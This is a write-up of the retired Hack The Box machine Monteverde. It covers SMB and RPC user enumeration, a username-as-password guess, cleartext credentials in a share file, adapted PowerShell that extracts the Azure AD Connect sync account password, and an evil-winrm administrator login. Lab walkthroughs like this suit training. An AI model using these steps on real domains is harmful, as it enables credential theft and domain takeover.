Hackthebox - Retired - Montverde

Hackthebox.eu - Retired - Monteverde

Recon

As always I start with a simple UP/Down scan on all TCP ports to see what is open

 nmap -T4 -p- -oX /root/Desktop/HTB/monteverde/nmapb.xml 10.10.10.172

Then I convert that to HTML

xsltproc /root/Desktop/HTB/monteverde/nmapb.xml -o /root/Desktop/HTB/monteverde/nmapb.html

That’s a bunch of open ports. Lets run nmap again against these ports with the -A switch to try and finger OS/Service

nmap -T4 -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49669,49670,49673,49702 -A -oX /root/Desktop/HTB/monteverde/nmaf.xml 10.10.10.172

Then convert that to HTML

xsltproc /root/Desktop/HTB/monteverde/nmaf.xml -o /root/Desktop/HTB/monteverde/nmapf.html    *****fixed my little typo here in the name of the file

Ok It looks like a windows box, and a Domain controller at that.

We can see megabank.local for a domain name, we can also see what looks like winRM on 5985

Let’s try to see if we can see anything on smb

It’s there and allowed us to connect anonymously…. But didn’t list anything

Since its open let's see if we can connect with rpcclient

Let’s grab the users

user:[Guest] rid:[0x1f5]

user:[AAD_987d7f2f57d2] rid:[0x450]

user:[mhope] rid:[0x641]

user:[SABatchJobs] rid:[0xa2a]

user:[svc-ata] rid:[0xa2b]

user:[svc-bexec] rid:[0xa2c]

user:[svc-netapp] rid:[0xa2d]

user:[dgalanos] rid:[0xa35]

user:[roleary] rid:[0xa36]

How about groups

group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]

group:[Domain Users] rid:[0x201]

group:[Domain Guests] rid:[0x202]

group:[Domain Computers] rid:[0x203]

group:[Group Policy Creator Owners] rid:[0x208]

group:[Cloneable Domain Controllers] rid:[0x20a]

group:[Protected Users] rid:[0x20d]

group:[DnsUpdateProxy] rid:[0x44e]

group:[Azure Admins] rid:[0xa29]

group:[File Server Admins] rid:[0xa2e]

group:[Call Recording Admins] rid:[0xa2f]

group:[Reception] rid:[0xa30]

group:[Operations] rid:[0xa31]

group:[Trading] rid:[0xa32]

group:[HelpDesk] rid:[0xa33]

group:[Developers] rid:[0xa34]

I fired up enum4linux to map some of this out for us.

enum4linux -a 10.10.10.172

Some of the output

Domain is Megabank

Group 'Operations' (RID: 2609) has member: MEGABANK\smorgan

Group 'Operations' (RID: 2609) has member: MEGABANK\smorgan

Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator

Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator

Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt

Group 'Domain Users' (RID: 513) has member: MEGABANK\AAD_987d7f2f57d2

Group 'Domain Users' (RID: 513) has member: MEGABANK\mhope

Group 'Domain Users' (RID: 513) has member: MEGABANK\SABatchJobs

Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-ata

Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-bexec

Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-netapp

Group 'Domain Users' (RID: 513) has member: MEGABANK\dgalanos

Group 'Domain Users' (RID: 513) has member: MEGABANK\roleary

Group 'Domain Users' (RID: 513) has member: MEGABANK\smorgan

Group 'Azure Admins' (RID: 2601) has member: MEGABANK\Administrator

Group 'Azure Admins' (RID: 2601) has member: MEGABANK\AAD_987d7f2f57d2

Group 'Azure Admins' (RID: 2601) has member: MEGABANK\mhope

Group 'HelpDesk' (RID: 2611) has member: MEGABANK\roleary

Group 'Trading' (RID: 2610) has member: MEGABANK\dgalanos

[+] Password Info for Domain: MEGABANK

        [+] Minimum password length: 7

        [+] Password history length: 24

        [+] Maximum password age: 41 days 23 hours 53 minutes 

        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0

                [+] Domain Password Store Cleartext: 0

                [+] Domain Password Lockout Admins: 0

                [+] Domain Password No Clear Change: 0

                [+] Domain Password No Anon Change: 0

                [+] Domain Password Complex: 0

        [+] Minimum password age: 1 day 4 minutes 

        [+] Reset Account Lockout Counter: 30 minutes 

        [+] Locked Account Duration: 30 minutes 

        [+] Account Lockout Threshold: None

        [+] Forced Log off Time: Not Set

Digging around on these accounts and from the logon date I can see that only 3 of the accounts have ever been logged into.

Mhope

SABatchJobs

AAD_987d7f2f57d2

We know the password policy from the output of enum4linux

I just tried logging into smb with them. I tried Mhope first with a couple of generic passwords then I moved on to SABatchjobs

Just tried the username for the password since there are no complexity requirements set in the pw policy

We got in

Exploit

I tried connecting up to the C$, E$ but no luck

But we do have access to users$

Started poking around and found a file named azure.xml under the mhope dir

I downloaded it using 

get azure.xml

That doesn’t look like anything…

I spent a couple hours moving around to different paths, but wasn’t able to move any further.. And My mind kept coming back to this file… why would it be there if I didn’t need it in someway to escalate….

Then it hit me, let's try to open this not with leafpad but with VIM

Yay!!! More creds

4n0therD4y@n0th3r$

Since we found this in mhope directory on the user share I bet these are their creds lets try using them for winRM since I didn’t have any luck with the SABatch account.

I’ve been using RubyWinRM

I edited my file to user her creds

Then ran it

#ruby rubywinRM 

Let’s get that hash yo

496*******************************

Alright, now let’s find out how to escalate.

Looking around at program installed I notice this has AD Sync installed to sync the ad to azure.

Pretty quickly found this blog on how to attack AD Sync to get the user info for the sync service which runs as a service 

https://blog.xpnsec.com/azuread-connect-for-redteam/

There is a PS1 script on the site which should get out the MSOL user account 

First we need to look around and see if we need to modify the script at all

Ok  Let’s first verify that ADSync DB exists

get-sqldatabase -serverinstance Monteverde

Sure does

Tried running the ps1 and got back lots of errors. It took me several hours to work through to a solution here to get it running

I just started to Troubleshoot as if I had written the code and tried to figure out where the script was breaking.

First  I just pulled the first two lines that were making the DB connection to see if we are even starting to talk to the DB

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"

$client.Open()

Connection error

Well we might need to change some things here. First let's change the data source to be Monteverde our box we are working against

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=Monteverde;Initial Catalog=ADSync"

$client.Open()

Ok now we got a login error, that is better than not seeing the DB server at all..

Next googled around for making DB connections for powershell and I found something that we might need to add to our connection string

Let’s add in our user/pass for mhope to see if that lets us in

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=Monteverde;Initial Catalog=ADSync;user=megabank\mhope;password='4n0therD4y@n0th3r$'"

$client.Open()

Login failed….. Ok what if we use integrated security to use windows authentication

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=Monteverde;Integrated Security = True;Initial Catalog=ADSync"

$client.Open()

No errors, cool, let's swap out that for the connection string in the PS1 we found.

Errors about missing ‘   

Okay the strings where its complaining on line 68 look fine to my eyes but let’s remove that line just for testing and try again.

Now it’s complaining about the line above it… lets delete that too

I’m seeing a pattern here. Now it's complaining about the line above it. Let’s delete it too

Ok that was a jump now its line 44 which is

add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll’

Let’s try double quotes instead of single quotes

No errors, let’s add back in the three lines we deleted during our trouble shooting.

$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}

$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}

$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerXML}}

Yay!!! We got some new creds...

Domain: MEGABANK.LOCAL

Username: administrator

Password: d0m@in4dminyeah!

Let’s try to connect up to the RPC with these new creds

 evil-winrm -u megabank\\administrator -p 'd0m@in4dminyeah!' -i 10.10.10.172 -s /root/Desktop/HTB/monteverde/

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami

megabank\administrator

*Evil-WinRM* PS C:\Users\Administrator\Documents> cat C:\users\administrator\desktop\root.txt

129*******************************

That was fun.